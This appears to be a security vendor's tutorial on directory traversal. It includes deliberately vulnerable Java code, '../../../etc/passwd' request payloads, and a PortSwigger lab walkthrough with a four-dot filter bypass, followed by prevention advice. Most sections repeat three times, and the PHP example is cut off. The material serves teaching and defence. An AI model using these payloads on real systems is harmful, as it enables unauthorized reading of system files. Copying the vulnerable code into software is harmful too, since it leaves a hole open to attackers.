Products

Solutions

Resources

Search for API Security Tests

Mastering Directory Traversal: A Comprehensive Guide from Basics to Prevention

Directory Traversal vulnerability allows an attacker to access sensitive files or execute commands on the application server.

Directory Traversal vulnerability allows an attacker to access sensitive files or execute commands on the application server.

Directory Traversal vulnerability
Directory Traversal vulnerability
Directory Traversal vulnerability
Author Image

Medusa

8 mins

8 mins

In 2018, a directory traversal vulnerability was discovered in the File Manager plugin for WordPress, which allowed attackers to upload and execute malicious files on vulnerable websites. The vulnerability was caused by a lack of sanitization of user input in the "path" parameter of the plugin's code, which allowed attackers to traverse the server's directory structure and upload or execute files outside of the intended directory. This vulnerability affected over 700,000 websites and highlights the importance of implementing proper input validation and sanitization in web applications to prevent directory traversal attacks.

This blog covers the following:

  • What is Directory Traversal?

  • How does directory traversal occur?

  • Examples

  • How to exploit it?

  • Prevention Measures

What is Directory Traversal?

Directory Traversal, also known as Path Traversal, is a vulnerability that allows an attacker to access files and directories outside the intended folder. This type of attack occurs when an application does not properly sanitize user input, which can include special characters that allow the attacker to "traverse" the server's directory structure. In the worst cases, the attacker can then access sensitive files or execute commands on the server. It is important for web developers to implement proper input validation and sanitization techniques to prevent these types of attacks.

Here are two examples of code vulnerable to Directory Traversal

PHP Vulnerable Code

<

This code takes a file name as an input from a user via the GET parameter "file", and then includes the contents of that file within the PHP script. The file is included using an absolute file path that is hardcoded into the script.

Java Vulnerable Code

public static String readFile(String filename) throws IOException {
   File file = new File(filename);
   BufferedReader reader = new BufferedReader(new FileReader(file));
   String line = null;
   StringBuilder stringBuilder = new StringBuilder();
   String ls = System.getProperty("line.separator");
   while ((line = reader.readLine()) != null) {
      stringBuilder.append(line);
      stringBuilder.append(ls);
   }
   reader.close();
   return stringBuilder.toString();
}

// Directory Traversal vulnerability
String filename = request.getParameter("filename");
String fileContent = readFile("/var/www/files/" + filename);

In both of these examples, the code is vulnerable to directory traversal attacks because it fails to properly sanitize user input before using it to construct a file path. An attacker can use "../" characters to navigate up the directory tree and access files outside of the intended directory. For instance, if the attacker sets the "file" parameter to "../../../../../etc/passwd", the server will attempt to parse the user input, going back a few directories due to the "../" notation. This sets the file parameter to the new user input value and includes the file "/path/to/files/../../../../../etc/passwd". As a result, the attacker could view the contents of the sensitive file "passwd".

If you would like to watch a video on this, check this out!

In 2018, a directory traversal vulnerability was discovered in the File Manager plugin for WordPress, which allowed attackers to upload and execute malicious files on vulnerable websites. The vulnerability was caused by a lack of sanitization of user input in the "path" parameter of the plugin's code, which allowed attackers to traverse the server's directory structure and upload or execute files outside of the intended directory. This vulnerability affected over 700,000 websites and highlights the importance of implementing proper input validation and sanitization in web applications to prevent directory traversal attacks.

This blog covers the following:

  • What is Directory Traversal?

  • How does directory traversal occur?

  • Examples

  • How to exploit it?

  • Prevention Measures

What is Directory Traversal?

Directory Traversal, also known as Path Traversal, is a vulnerability that allows an attacker to access files and directories outside the intended folder. This type of attack occurs when an application does not properly sanitize user input, which can include special characters that allow the attacker to "traverse" the server's directory structure. In the worst cases, the attacker can then access sensitive files or execute commands on the server. It is important for web developers to implement proper input validation and sanitization techniques to prevent these types of attacks.

Here are two examples of code vulnerable to Directory Traversal

PHP Vulnerable Code

<

This code takes a file name as an input from a user via the GET parameter "file", and then includes the contents of that file within the PHP script. The file is included using an absolute file path that is hardcoded into the script.

Java Vulnerable Code

public static String readFile(String filename) throws IOException {
   File file = new File(filename);
   BufferedReader reader = new BufferedReader(new FileReader(file));
   String line = null;
   StringBuilder stringBuilder = new StringBuilder();
   String ls = System.getProperty("line.separator");
   while ((line = reader.readLine()) != null) {
      stringBuilder.append(line);
      stringBuilder.append(ls);
   }
   reader.close();
   return stringBuilder.toString();
}

// Directory Traversal vulnerability
String filename = request.getParameter("filename");
String fileContent = readFile("/var/www/files/" + filename);

In both of these examples, the code is vulnerable to directory traversal attacks because it fails to properly sanitize user input before using it to construct a file path. An attacker can use "../" characters to navigate up the directory tree and access files outside of the intended directory. For instance, if the attacker sets the "file" parameter to "../../../../../etc/passwd", the server will attempt to parse the user input, going back a few directories due to the "../" notation. This sets the file parameter to the new user input value and includes the file "/path/to/files/../../../../../etc/passwd". As a result, the attacker could view the contents of the sensitive file "passwd".

If you would like to watch a video on this, check this out!

In 2018, a directory traversal vulnerability was discovered in the File Manager plugin for WordPress, which allowed attackers to upload and execute malicious files on vulnerable websites. The vulnerability was caused by a lack of sanitization of user input in the "path" parameter of the plugin's code, which allowed attackers to traverse the server's directory structure and upload or execute files outside of the intended directory. This vulnerability affected over 700,000 websites and highlights the importance of implementing proper input validation and sanitization in web applications to prevent directory traversal attacks.

This blog covers the following:

  • What is Directory Traversal?

  • How does directory traversal occur?

  • Examples

  • How to exploit it?

  • Prevention Measures

What is Directory Traversal?

Directory Traversal, also known as Path Traversal, is a vulnerability that allows an attacker to access files and directories outside the intended folder. This type of attack occurs when an application does not properly sanitize user input, which can include special characters that allow the attacker to "traverse" the server's directory structure. In the worst cases, the attacker can then access sensitive files or execute commands on the server. It is important for web developers to implement proper input validation and sanitization techniques to prevent these types of attacks.

Here are two examples of code vulnerable to Directory Traversal

PHP Vulnerable Code

<

This code takes a file name as an input from a user via the GET parameter "file", and then includes the contents of that file within the PHP script. The file is included using an absolute file path that is hardcoded into the script.

Java Vulnerable Code

public static String readFile(String filename) throws IOException {
   File file = new File(filename);
   BufferedReader reader = new BufferedReader(new FileReader(file));
   String line = null;
   StringBuilder stringBuilder = new StringBuilder();
   String ls = System.getProperty("line.separator");
   while ((line = reader.readLine()) != null) {
      stringBuilder.append(line);
      stringBuilder.append(ls);
   }
   reader.close();
   return stringBuilder.toString();
}

// Directory Traversal vulnerability
String filename = request.getParameter("filename");
String fileContent = readFile("/var/www/files/" + filename);

In both of these examples, the code is vulnerable to directory traversal attacks because it fails to properly sanitize user input before using it to construct a file path. An attacker can use "../" characters to navigate up the directory tree and access files outside of the intended directory. For instance, if the attacker sets the "file" parameter to "../../../../../etc/passwd", the server will attempt to parse the user input, going back a few directories due to the "../" notation. This sets the file parameter to the new user input value and includes the file "/path/to/files/../../../../../etc/passwd". As a result, the attacker could view the contents of the sensitive file "passwd".

If you would like to watch a video on this, check this out!

Want the best proactive API Security product?

Our customers love us for our proactive approach and world class API Security test templates. Try Akto's test library yourself in your testing playground. Play with the default test or add your own.

Directory Traversal in API Endpoint

Here's an example of an HTTP request and response in an API endpoint vulnerable to directory traversal:

HTTP Request:

GET /api/files?file=../../../etc/passwd HTTP/1.1
Host: example.com

In this example, the attacker is attempting to access the sensitive file "passwd" by using "../" characters to traverse the server's directory structure.

HTTP Response:

HTTP/1.1 200 OK
Content-Type: text/plain

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

In this example, the server has responded with the contents of the "passwd" file, which contains sensitive information about the server's users.

Proper input validation and sanitization can prevent these types of attacks by ensuring that the file path provided by the user does not contain any "../" characters, and is limited to the intended directory.

Practical Demonstration

Target Application: PortSwigger Lab

The application is an e-commerce website that contains products and you can click on each product to see its details.

I’ve turned on my Burp Proxy and it is capturing requests behind the scenes. After exploring and clicking on some products, this is the proxy history I have in BurpSuite.

By default, you cannot view jpg requests. To filter jpg requests, you must use the filter settings in the HTTP history filter tab.

You can select the request with the path /image/filename=36.jpg to fetch the photo for a specific product.

To exploit the system, send the request with the payload. ..../..../..../..../etc/passwd to the repeater and change the filename value. The payload uses "../" characters to navigate the server's directory structure and access sensitive files outside of the intended directory. In this case, the attacker is attempting to access the "passwd" file located in the "/etc/" directory, which contains sensitive information about the server's users. Proper input validation and sanitization can prevent these types of attacks by ensuring that the file path provided by the user does not contain any "../" characters and is limited to the intended directory.

You may be wondering why I didn't use "../../../etc/passwd". The reason is that the application was truncating "..", so I used four dots to bypass this. If the initial payload is "..../," the backend will truncate ".." and the result will be "../". The backend will then process "../" to go back to one directory and show us the required result leading to successful exploitation.

The response displays the contents of the /etc/passwd file, which should be kept confidential.

If an attacker gains access to the /etc/passwd file, they may obtain sensitive information about the server's users, such as usernames and hashed passwords. This information can then be used in further attacks, such as password cracking or phishing attempts.

In this case, a simple payload was used. If you are unsure about which payload to use and want to save time, you can try a fuzzing attack. Simply send the request to the repeater and mark the value you want to change in every subsequent request.

There are various directory traversal wordlists available. Once you have them, you can use Intruder or any other fuzzing tool to start the attack.

Prevention Measures

Here are some preventative measures that can be implemented to protect against directory traversal attacks:

  • Input validation and sanitization: Ensure that all user input is properly validated and sanitized before being used in a file path or URL. This can include disallowing certain characters, encoding user input, and limiting the depth of directory traversal.

  • File system permissions: Set appropriate file system permissions to prevent unauthorized access to sensitive files and directories. This can include setting read and write permissions, as well as restricting access to certain users or groups.

  • Web server configuration: Configure the web server to prevent directory traversal attacks. This can include setting up access controls, disabling directory indexing, and using secure programming practices.

  • Use of frameworks and libraries: Use secure frameworks and libraries that have built-in protection against directory traversal attacks. This can include using functions that properly sanitize user input and limit directory traversal.

  • Regular updates and patches: Keep all software and applications up-to-date with the latest security patches and updates. This can help to prevent known vulnerabilities from being exploited.

By implementing these prevention measures, organizations can effectively protect against directory traversal attacks and ensure the security of their systems and data.

Directory Traversal in API Endpoint

Here's an example of an HTTP request and response in an API endpoint vulnerable to directory traversal:

HTTP Request:

GET /api/files?file=../../../etc/passwd HTTP/1.1
Host: example.com

In this example, the attacker is attempting to access the sensitive file "passwd" by using "../" characters to traverse the server's directory structure.

HTTP Response:

HTTP/1.1 200 OK
Content-Type: text/plain

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

In this example, the server has responded with the contents of the "passwd" file, which contains sensitive information about the server's users.

Proper input validation and sanitization can prevent these types of attacks by ensuring that the file path provided by the user does not contain any "../" characters, and is limited to the intended directory.

Practical Demonstration

Target Application: PortSwigger Lab

The application is an e-commerce website that contains products and you can click on each product to see its details.

I’ve turned on my Burp Proxy and it is capturing requests behind the scenes. After exploring and clicking on some products, this is the proxy history I have in BurpSuite.

By default, you cannot view jpg requests. To filter jpg requests, you must use the filter settings in the HTTP history filter tab.

You can select the request with the path /image/filename=36.jpg to fetch the photo for a specific product.

To exploit the system, send the request with the payload. ..../..../..../..../etc/passwd to the repeater and change the filename value. The payload uses "../" characters to navigate the server's directory structure and access sensitive files outside of the intended directory. In this case, the attacker is attempting to access the "passwd" file located in the "/etc/" directory, which contains sensitive information about the server's users. Proper input validation and sanitization can prevent these types of attacks by ensuring that the file path provided by the user does not contain any "../" characters and is limited to the intended directory.

You may be wondering why I didn't use "../../../etc/passwd". The reason is that the application was truncating "..", so I used four dots to bypass this. If the initial payload is "..../," the backend will truncate ".." and the result will be "../". The backend will then process "../" to go back to one directory and show us the required result leading to successful exploitation.

The response displays the contents of the /etc/passwd file, which should be kept confidential.

If an attacker gains access to the /etc/passwd file, they may obtain sensitive information about the server's users, such as usernames and hashed passwords. This information can then be used in further attacks, such as password cracking or phishing attempts.

In this case, a simple payload was used. If you are unsure about which payload to use and want to save time, you can try a fuzzing attack. Simply send the request to the repeater and mark the value you want to change in every subsequent request.

There are various directory traversal wordlists available. Once you have them, you can use Intruder or any other fuzzing tool to start the attack.

Prevention Measures

Here are some preventative measures that can be implemented to protect against directory traversal attacks:

  • Input validation and sanitization: Ensure that all user input is properly validated and sanitized before being used in a file path or URL. This can include disallowing certain characters, encoding user input, and limiting the depth of directory traversal.

  • File system permissions: Set appropriate file system permissions to prevent unauthorized access to sensitive files and directories. This can include setting read and write permissions, as well as restricting access to certain users or groups.

  • Web server configuration: Configure the web server to prevent directory traversal attacks. This can include setting up access controls, disabling directory indexing, and using secure programming practices.

  • Use of frameworks and libraries: Use secure frameworks and libraries that have built-in protection against directory traversal attacks. This can include using functions that properly sanitize user input and limit directory traversal.

  • Regular updates and patches: Keep all software and applications up-to-date with the latest security patches and updates. This can help to prevent known vulnerabilities from being exploited.

By implementing these prevention measures, organizations can effectively protect against directory traversal attacks and ensure the security of their systems and data.

Directory Traversal in API Endpoint

Here's an example of an HTTP request and response in an API endpoint vulnerable to directory traversal:

HTTP Request:

GET /api/files?file=../../../etc/passwd HTTP/1.1
Host: example.com

In this example, the attacker is attempting to access the sensitive file "passwd" by using "../" characters to traverse the server's directory structure.

HTTP Response:

HTTP/1.1 200 OK
Content-Type: text/plain

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

In this example, the server has responded with the contents of the "passwd" file, which contains sensitive information about the server's users.

Proper input validation and sanitization can prevent these types of attacks by ensuring that the file path provided by the user does not contain any "../" characters, and is limited to the intended directory.

Practical Demonstration

Target Application: PortSwigger Lab

The application is an e-commerce website that contains products and you can click on each product to see its details.

I’ve turned on my Burp Proxy and it is capturing requests behind the scenes. After exploring and clicking on some products, this is the proxy history I have in BurpSuite.

By default, you cannot view jpg requests. To filter jpg requests, you must use the filter settings in the HTTP history filter tab.

You can select the request with the path /image/filename=36.jpg to fetch the photo for a specific product.

To exploit the system, send the request with the payload. ..../..../..../..../etc/passwd to the repeater and change the filename value. The payload uses "../" characters to navigate the server's directory structure and access sensitive files outside of the intended directory. In this case, the attacker is attempting to access the "passwd" file located in the "/etc/" directory, which contains sensitive information about the server's users. Proper input validation and sanitization can prevent these types of attacks by ensuring that the file path provided by the user does not contain any "../" characters and is limited to the intended directory.

You may be wondering why I didn't use "../../../etc/passwd". The reason is that the application was truncating "..", so I used four dots to bypass this. If the initial payload is "..../," the backend will truncate ".." and the result will be "../". The backend will then process "../" to go back to one directory and show us the required result leading to successful exploitation.

The response displays the contents of the /etc/passwd file, which should be kept confidential.

If an attacker gains access to the /etc/passwd file, they may obtain sensitive information about the server's users, such as usernames and hashed passwords. This information can then be used in further attacks, such as password cracking or phishing attempts.

In this case, a simple payload was used. If you are unsure about which payload to use and want to save time, you can try a fuzzing attack. Simply send the request to the repeater and mark the value you want to change in every subsequent request.

There are various directory traversal wordlists available. Once you have them, you can use Intruder or any other fuzzing tool to start the attack.

Prevention Measures

Here are some preventative measures that can be implemented to protect against directory traversal attacks:

  • Input validation and sanitization: Ensure that all user input is properly validated and sanitized before being used in a file path or URL. This can include disallowing certain characters, encoding user input, and limiting the depth of directory traversal.

  • File system permissions: Set appropriate file system permissions to prevent unauthorized access to sensitive files and directories. This can include setting read and write permissions, as well as restricting access to certain users or groups.

  • Web server configuration: Configure the web server to prevent directory traversal attacks. This can include setting up access controls, disabling directory indexing, and using secure programming practices.

  • Use of frameworks and libraries: Use secure frameworks and libraries that have built-in protection against directory traversal attacks. This can include using functions that properly sanitize user input and limit directory traversal.

  • Regular updates and patches: Keep all software and applications up-to-date with the latest security patches and updates. This can help to prevent known vulnerabilities from being exploited.

By implementing these prevention measures, organizations can effectively protect against directory traversal attacks and ensure the security of their systems and data.

Share this post

Share this post

Share this post

Monthly product updates in your inbox. No spam.